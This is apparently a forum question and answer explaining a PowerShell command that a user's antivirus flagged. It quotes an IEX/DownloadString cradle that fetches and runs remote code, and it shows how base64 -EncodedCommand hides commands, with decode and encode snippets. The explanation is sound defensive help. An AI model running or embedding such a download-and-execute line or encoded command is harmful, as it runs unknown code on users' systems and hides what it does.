My anti virus keeps alerting me with below mentioned powershell command. I'm a bit familiar with Powershell but can't understand what does below powershell script does. Also most importantly I want to know what is "-e" parameter, used in command line
SUSPICIOUS COMMAND LINE:
powershell -e sqbfafgakaboaguadwatae8aygbqaguaywb0acaatgblahqalgbxaguaygbdagwaaqbl
SUSPICIOUS SCRIPT:
IEX(New-Object Net.WebClient).DownloadString('https://example.org/xmpsdh')
As for the script:
IEX((New-Object Net.WebClient).DownloadString('https://example.org/xmpsdh'))
downloads a string from the given URL and tries to execute it as a PowerShell command, via IEX
, the built-in alias for the (generally to be avoided) Invoke-Expression
cmdlet.
In other words: it downloads unknown PowerShell commands from a website and executes them.
As for the command line:
-e
is short for the PowerShell CLI's -EncodedCommand
parameter, which accepts commands as Base64-encoded strings.
The purpose of this parameter is to enable robust passing of complex command strings without running into problems with quoting and escaping.
However, malware uses the parameter as an obfuscation technique: you cannot easily tell what the command is doing.
Example:
# -e is short for -EncodedCommand
powershell -e RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA
is the equivalent of:
powershell -Command "Get-Date -Format yyyy"
You can decode a given Base64-encoded argument as follows:
$base64 = 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
# -> 'Get-Date -Format yyyy'
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($base64))
Conversely, if you want to Base64-encode a string for -EncodedCommand
:
$command = 'Get-Date -Format yyyy'
# -> 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))